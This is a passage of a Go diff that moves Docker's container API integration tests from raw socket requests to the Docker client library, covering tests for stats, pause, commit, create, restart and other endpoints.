{ + var foundContainer containerPs + for _, c := range containers { + for _, testName := range c.Names { if "/"+name == testName { - foundContainer = &container + foundContainer.Names = c.Names + foundContainer.Ports = c.Ports break } } } c.Assert(foundContainer.Ports, checker.HasLen, 1) - c.Assert(foundContainer.Ports[0]["PrivatePort"], checker.Equals, float64(port)) - _, ok := foundContainer.Ports[0]["PublicPort"] - c.Assert(ok, checker.Not(checker.Equals), true) - _, ok = foundContainer.Ports[0]["IP"] - c.Assert(ok, checker.Not(checker.Equals), true) + c.Assert(foundContainer.Ports[0].PrivatePort, checker.Equals, uint16(port)) + c.Assert(foundContainer.Ports[0].PublicPort, checker.NotNil) + c.Assert(foundContainer.Ports[0].IP, checker.NotNil) } func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) { @@ -130,12 +143,15 @@ func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) { name := "exportcontainer" dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test") - status, body, err := sockRequest("GET", "/containers/"+name+"/export", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() + body, err := cli.ContainerExport(context.Background(), name) + c.Assert(err, checker.IsNil) + defer body.Close() found := false - for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + for tarReader := tar.NewReader(body); ; { h, err := tarReader.Next() if err != nil && err == io.EOF { break @@ -154,15 +170,12 @@ func (s *DockerSuite) TestContainerAPIGetChanges(c *check.C) { name := "changescontainer" dockerCmd(c, "run", "--name", name, "busybox", "rm", "/etc/passwd") - status, body, err := sockRequest("GET", "/containers/"+name+"/changes", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - changes := []struct { - Kind int - Path string - }{} - c.Assert(json.Unmarshal(body, 
&changes), checker.IsNil, check.Commentf("unable to unmarshal response body")) + changes, err := cli.ContainerDiff(context.Background(), name) + c.Assert(err, checker.IsNil) // Check the changelog for removal of /etc/passwd success := false @@ -181,14 +194,19 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) { runSleepingContainer(c, "--name", name) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } + bc := make(chan b, 1) go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) - bc <- b{status, body, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), name, true) + c.Assert(err, checker.IsNil) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -201,10 +219,8 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) { case <-time.After(2 * time.Second): c.Fatal("stream was not closed after container was removed") case sr := <-bc: - c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - dec := json.NewDecoder(bytes.NewBuffer(sr.body)) + dec := json.NewDecoder(sr.stats.Body) + defer sr.stats.Body.Close() var s *types.Stats // decode only one object from the stream c.Assert(dec.Decode(&s), checker.IsNil) @@ -212,19 +228,23 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) { } func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) - buf := &integration.ChannelBuffer{make(chan []byte, 1)} + buf := &ChannelBuffer{C: make(chan []byte, 1)} defer buf.Close() - _, body, err := sockRequestRaw("GET", "/containers/"+id+"/stats?stream=1", nil, "application/json") + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - defer body.Close() + defer cli.Close() + + stats, err := 
cli.ContainerStats(context.Background(), id, true) + c.Assert(err, checker.IsNil) + defer stats.Body.Close() chErr := make(chan error, 1) go func() { - _, err = io.Copy(buf, body) + _, err = io.Copy(buf, stats.Body) chErr <- err }() @@ -243,6 +263,34 @@ func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) { c.Assert(<-chErr, checker.IsNil) } +// ChannelBuffer holds a chan of byte array that can be populate in a goroutine. +type ChannelBuffer struct { + C chan []byte +} + +// Write implements Writer. +func (c *ChannelBuffer) Write(b []byte) (int, error) { + c.C <- b + return len(b), nil +} + +// Close closes the go channel. +func (c *ChannelBuffer) Close() error { + close(c.C) + return nil +} + +// ReadTimeout reads the content of the channel in the specified byte array with +// the specified duration as timeout. +func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) { + select { + case b := <-c.C: + return copy(p[0:], b), nil + case <-time.After(n): + return -1, fmt.Errorf("timeout reading from channel") + } +} + // regression test for gh13421 // previous test was just checking one stat entry so it didn't fail (stats with // stream false always return one stat) @@ -251,14 +299,19 @@ func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) { runSleepingContainer(c, "--name", name) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } + bc := make(chan b, 1) go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) - bc <- b{status, body, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), name, true) + c.Assert(err, checker.IsNil) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -271,10 +324,10 @@ func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) { case <-time.After(2 * time.Second): c.Fatal("stream was not 
closed after container was removed") case sr := <-bc: - c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - s := string(sr.body) + b, err := ioutil.ReadAll(sr.stats.Body) + defer sr.stats.Body.Close() + c.Assert(err, checker.IsNil) + s := string(b) // count occurrences of "read" of types.Stats if l := strings.Count(s, "read"); l < 2 { c.Fatalf("Expected more than one stat streamed, got %d", l) @@ -287,14 +340,20 @@ func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) { runSleepingContainer(c, "--name", name) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } + bc := make(chan b, 1) + go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats?stream=0", nil) - bc <- b{status, body, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), name, false) + c.Assert(err, checker.IsNil) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -307,10 +366,10 @@ func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) { case <-time.After(2 * time.Second): c.Fatal("stream was not closed after container was removed") case sr := <-bc: - c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - s := string(sr.body) + b, err := ioutil.ReadAll(sr.stats.Body) + defer sr.stats.Body.Close() + c.Assert(err, checker.IsNil) + s := string(b) // count occurrences of `"read"` of types.Stats c.Assert(strings.Count(s, `"read"`), checker.Equals, 1, check.Commentf("Expected only one stat streamed, got %d", strings.Count(s, `"read"`))) } @@ -320,24 +379,23 @@ func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) { name := "statscontainer" dockerCmd(c, "create", "--name", name, "busybox", "ps") - type stats struct { - status int - err error - } - chResp := make(chan stats) + chResp := make(chan error) // We 
expect an immediate response, but if it's not immediate, the test would hang, so put it in a goroutine // below we'll check this on a timeout. go func() { - resp, body, err := sockRequestRaw("GET", "/containers/"+name+"/stats", nil, "") - body.Close() - chResp <- stats{resp.StatusCode, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + resp, err := cli.ContainerStats(context.Background(), name, false) + defer resp.Body.Close() + chResp <- err }() select { - case r := <-chResp: - c.Assert(r.err, checker.IsNil) - c.Assert(r.status, checker.Equals, http.StatusOK) + case err := <-chResp: + c.Assert(err, checker.IsNil) case <-time.After(10 * time.Second): c.Fatal("timeout waiting for stats response for stopped container") } @@ -346,28 +404,32 @@ func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) { func (s *DockerSuite) TestContainerAPIPause(c *check.C) { // Problematic on Windows as Windows does not support pause testRequires(c, DaemonIsLinux) - defer unpauseAllContainers() - out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "30") + + getPaused := func(c *check.C) []string { + return strings.Fields(cli.DockerCmd(c, "ps", "-f", "status=paused", "-q", "-a").Combined()) + } + + out := cli.DockerCmd(c, "run", "-d", "busybox", "sleep", "30").Combined() ContainerID := strings.TrimSpace(out) - status, _, err := sockRequest("POST", "/containers/"+ContainerID+"/pause", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerPause(context.Background(), ContainerID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) - pausedContainers, err := getSliceOfPausedContainers() - c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) + pausedContainers := getPaused(c) if len(pausedContainers) != 1 || stringid.TruncateID(ContainerID) != pausedContainers[0] { c.Fatalf("there should be one 
paused container and not %d", len(pausedContainers)) } - status, _, err = sockRequest("POST", "/containers/"+ContainerID+"/unpause", nil) + err = cli.ContainerUnpause(context.Background(), ContainerID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) - pausedContainers, err = getSliceOfPausedContainers() - c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) - c.Assert(pausedContainers, checker.IsNil, check.Commentf("There should be no paused container.")) + pausedContainers = getPaused(c) + c.Assert(pausedContainers, checker.HasLen, 0, check.Commentf("There should be no paused container.")) } func (s *DockerSuite) TestContainerAPITop(c *check.C) { @@ -376,15 +438,13 @@ func (s *DockerSuite) TestContainerAPITop(c *check.C) { id := strings.TrimSpace(string(out)) c.Assert(waitRun(id), checker.IsNil) - type topResp struct { - Titles []string - Processes [][]string - } - var top topResp - status, b, err := sockRequest("GET", "/containers/"+id+"/top?ps_args=aux", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + // sort by comm[andline] to make sure order stays the same in case of PID rollover + top, err := cli.ContainerTop(context.Background(), id, []string{"aux", "--sort=comm"}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(json.Unmarshal(b, &top), checker.IsNil) c.Assert(top.Titles, checker.HasLen, 11, check.Commentf("expected 11 titles, found %d: %v", len(top.Titles), top.Titles)) if top.Titles[0] != "USER" || top.Titles[10] != "COMMAND" { @@ -397,19 +457,16 @@ func (s *DockerSuite) TestContainerAPITop(c *check.C) { func (s *DockerSuite) TestContainerAPITopWindows(c *check.C) { testRequires(c, DaemonIsWindows) - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") id := strings.TrimSpace(string(out)) c.Assert(waitRun(id), checker.IsNil) - type topResp struct { - 
Titles []string - Processes [][]string - } - var top topResp - status, b, err := sockRequest("GET", "/containers/"+id+"/top", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + top, err := cli.ContainerTop(context.Background(), id, nil) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(json.Unmarshal(b, &top), checker.IsNil) c.Assert(top.Titles, checker.HasLen, 4, check.Commentf("expected 4 titles, found %d: %v", len(top.Titles), top.Titles)) if top.Titles[0] != "Name" || top.Titles[3] != "Private Working Set" { @@ -433,16 +490,16 @@ func (s *DockerSuite) TestContainerAPICommit(c *check.C) { cName := "testapicommit" dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") - name := "testcontainerapicommit" - status, b, err := sockRequest("POST", "/commit?repo="+name+"&testtag=tag&container="+cName, nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - type resp struct { - ID string + options := types.ContainerCommitOptions{ + Reference: "testcontainerapicommit:testtag", } - var img resp - c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + img, err := cli.ContainerCommit(context.Background(), cName, options) + c.Assert(err, checker.IsNil) cmd := inspectField(c, img.ID, "Config.Cmd") c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd)) @@ -455,20 +512,20 @@ func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) { cName := "testapicommitwithconfig" dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") - config := map[string]interface{}{ - "Labels": map[string]string{"key1": "value1", "key2": "value2"}, - } - - name := "testcontainerapicommitwithconfig" - status, b, err := sockRequest("POST", "/commit?repo="+name+"&container="+cName, config) + cli, err := 
client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - type resp struct { - ID string + config := containertypes.Config{ + Labels: map[string]string{"key1": "value1", "key2": "value2"}} + + options := types.ContainerCommitOptions{ + Reference: "testcontainerapicommitwithconfig", + Config: &config, } - var img resp - c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + img, err := cli.ContainerCommit(context.Background(), cName, options) + c.Assert(err, checker.IsNil) label1 := inspectFieldMap(c, img.ID, "Config.Labels", "key1") c.Assert(label1, checker.Equals, "value1") @@ -486,76 +543,79 @@ func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) { func (s *DockerSuite) TestContainerAPIBadPort(c *check.C) { // TODO Windows to Windows CI - Port this test testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", "echo test"}, - "PortBindings": map[string]interface{}{ - "8080/tcp": []map[string]interface{}{ + + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", "echo test"}, + } + + hostConfig := containertypes.HostConfig{ + PortBindings: nat.PortMap{ + "8080/tcp": []nat.PortBinding{ { - "HostIP": "", - "HostPort": "aa80", - }, + HostIP: "", + HostPort: "aa80"}, }, }, } - jsonData := bytes.NewBuffer(nil) - json.NewEncoder(jsonData).Encode(config) - - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(getErrorMessage(c, body), checker.Equals, `invalid port specification: "aa80"`, check.Commentf("Incorrect error msg: %s", body)) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err.Error(), checker.Contains, `invalid port 
specification: "aa80"`) } func (s *DockerSuite) TestContainerAPICreate(c *check.C) { - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", "touch /test && ls /test"}, + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", "touch /test && ls /test"}, } - status, b, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - type createResp struct { - ID string - } - var container createResp - c.Assert(json.Unmarshal(b, &container), checker.IsNil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", container.ID) c.Assert(strings.TrimSpace(out), checker.Equals, "/test") } func (s *DockerSuite) TestContainerAPICreateEmptyConfig(c *check.C) { - config := map[string]interface{}{} - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &containertypes.Config{}, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") - expected := "Config cannot be empty in order to create a container" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + expected := "No command specified" + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) { // Container creation must fail if client specified configurations for more than one network - config := map[string]interface{}{ - "Image": "busybox", - "NetworkingConfig": networktypes.NetworkingConfig{ - EndpointsConfig: map[string]*networktypes.EndpointSettings{ - 
"net1": {}, - "net2": {}, - "net3": {}, - }, + config := containertypes.Config{ + Image: "busybox", + } + + networkingConfig := networktypes.NetworkingConfig{ + EndpointsConfig: map[string]*networktypes.EndpointSettings{ + "net1": {}, + "net2": {}, + "net3": {}, }, } - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) - msg := getErrorMessage(c, body) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networkingConfig, "") + msg := err.Error() // network name order in error message is not deterministic c.Assert(msg, checker.Contains, "Container cannot be connected to network endpoints") c.Assert(msg, checker.Contains, "net1") @@ -564,48 +624,25 @@ func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) { } func (s *DockerSuite) TestContainerAPICreateWithHostName(c *check.C) { - hostName := "test-host" - config := map[string]interface{}{ - "Image": "busybox", - "Hostname": hostName, - } - - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) - - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) - c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname")) -} - -func (s *DockerSuite) TestContainerAPICreateWithDomainName(c *check.C) { domainName := "test-domain" - config := map[string]interface{}{ - "Image": "busybox", - "Domainname": domainName, + hostName := 
"test-hostname" + config := containertypes.Config{ + Image: "busybox", + Hostname: hostName, + Domainname: domainName, } - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname")) c.Assert(containerJSON.Config.Domainname, checker.Equals, domainName, check.Commentf("Mismatched Domainname")) } @@ -622,51 +659,51 @@ func (s *DockerSuite) TestContainerAPICreateOtherNetworkModes(c *check.C) { UtilCreateNetworkMode(c, "container:web1") } -func UtilCreateNetworkMode(c *check.C, networkMode string) { - config := map[string]interface{}{ - "Image": "busybox", - "HostConfig": map[string]interface{}{"NetworkMode": networkMode}, +func UtilCreateNetworkMode(c *check.C, networkMode containertypes.NetworkMode) { + config := containertypes.Config{ + Image: "busybox", } - status, body, err := sockRequest("POST", "/containers/create", config) + hostConfig := containertypes.HostConfig{ + NetworkMode: networkMode, + } + + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - var container 
containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) + container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + containerJSON, err := cli.ContainerInspect(context.Background(), container.ID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var containerJSON types.ContainerJSON - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) c.Assert(containerJSON.HostConfig.NetworkMode, checker.Equals, containertypes.NetworkMode(networkMode), check.Commentf("Mismatched NetworkMode")) } func (s *DockerSuite) TestContainerAPICreateWithCpuSharesCpuset(c *check.C) { // TODO Windows to Windows CI. The CpuShares part could be ported. testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "CpuShares": 512, - "CpusetCpus": "0", + config := containertypes.Config{ + Image: "busybox", } - status, body, err := sockRequest("POST", "/containers/create", config) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) - - var container containertypes.ContainerCreateCreatedBody - c.Assert(json.Unmarshal(body, &container), checker.IsNil) + hostConfig := containertypes.HostConfig{ + Resources: containertypes.Resources{ + CPUShares: 512, + CpusetCpus: "0", + }, + } - status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - var containerJSON types.ContainerJSON + container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) - c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + containerJSON, err := 
cli.ContainerInspect(context.Background(), container.ID) + c.Assert(err, checker.IsNil) out := inspectField(c, containerJSON.ID, "HostConfig.CpuShares") c.Assert(out, checker.Equals, "512") @@ -683,19 +720,29 @@ func (s *DockerSuite) TestContainerAPIVerifyHeader(c *check.C) { create := func(ct string) (*http.Response, io.ReadCloser, error) { jsonData := bytes.NewBuffer(nil) c.Assert(json.NewEncoder(jsonData).Encode(config), checker.IsNil) - return sockRequestRaw("POST", "/containers/create", jsonData, ct) + return request.Post("/containers/create", request.RawContent(ioutil.NopCloser(jsonData)), request.ContentType(ct)) } // Try with no content-type res, body, err := create("") c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + // todo: we need to figure out a better way to compare between dockerd versions + // comparing between daemon API version is not precise. + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } body.Close() // Try with wrong content-type res, body, err = create("application/xml") c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } body.Close() // now application/json @@ -719,11 +766,15 @@ func (s *DockerSuite) TestContainerAPIInvalidPortSyntax(c *check.C) { } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, 
http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "invalid port") } @@ -739,11 +790,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyInvalidPolicyName(c *check.C) } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "invalid restart policy") } @@ -759,11 +814,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyRetryMismatch(c *check.C) { } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "maximum 
retry count cannot be used with restart policy") } @@ -779,11 +838,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyNegativeRetryCount(c *check.C } }` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be negative") } @@ -799,7 +862,7 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyDefaultRetryCount(c *check.C) } }` - res, _, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, _, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) } @@ -830,11 +893,11 @@ func (s *DockerSuite) TestContainerAPIPostCreateNull(c *check.C) { "NetworkDisabled":false, "OnBuild":null}` - res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - b, err := readBody(body) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) type createResp struct { ID string @@ -861,12 +924,16 @@ func (s *DockerSuite) TestCreateWithTooLowMemoryLimit(c *check.C) { "Memory": 524287 }` - res, body, err := sockRequestRaw("POST", 
"/containers/create", strings.NewReader(config), "application/json") + res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - b, err2 := readBody(body) + b, err2 := request.ReadBody(body) c.Assert(err2, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } else { + c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK) + } c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") } @@ -875,10 +942,13 @@ func (s *DockerSuite) TestContainerAPIRename(c *check.C) { containerID := strings.TrimSpace(out) newName := "TestContainerAPIRenameNew" - statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/rename?name="+newName, nil) + + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerRename(context.Background(), containerID, newName) c.Assert(err, checker.IsNil) - // 204 No Content is expected, not 200 - c.Assert(statusCode, checker.Equals, http.StatusNoContent) name := inspectField(c, containerID, "Name") c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) @@ -888,9 +958,12 @@ func (s *DockerSuite) TestContainerAPIKill(c *check.C) { name := "test-api-kill" runSleepingContainer(c, "-i", "--name", name) - status, _, err := sockRequest("POST", "/containers/"+name+"/kill", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerKill(context.Background(), name, "SIGKILL") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) state := inspectField(c, name, "State.Running") c.Assert(state, checker.Equals, "false", check.Commentf("got wrong State from container %s: %q", name, state)) @@ -899,83 +972,99 @@ 
func (s *DockerSuite) TestContainerAPIKill(c *check.C) { func (s *DockerSuite) TestContainerAPIRestart(c *check.C) { name := "test-api-restart" runSleepingContainer(c, "-di", "--name", name) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - status, _, err := sockRequest("POST", "/containers/"+name+"/restart?t=1", nil) + timeout := 1 * time.Second + err = cli.ContainerRestart(context.Background(), name, &timeout) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) } func (s *DockerSuite) TestContainerAPIRestartNotimeoutParam(c *check.C) { name := "test-api-restart-no-timeout-param" - out, _ := runSleepingContainer(c, "-di", "--name", name) + out := runSleepingContainer(c, "-di", "--name", name) id := strings.TrimSpace(out) c.Assert(waitRun(id), checker.IsNil) - status, _, err := sockRequest("POST", "/containers/"+name+"/restart", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, 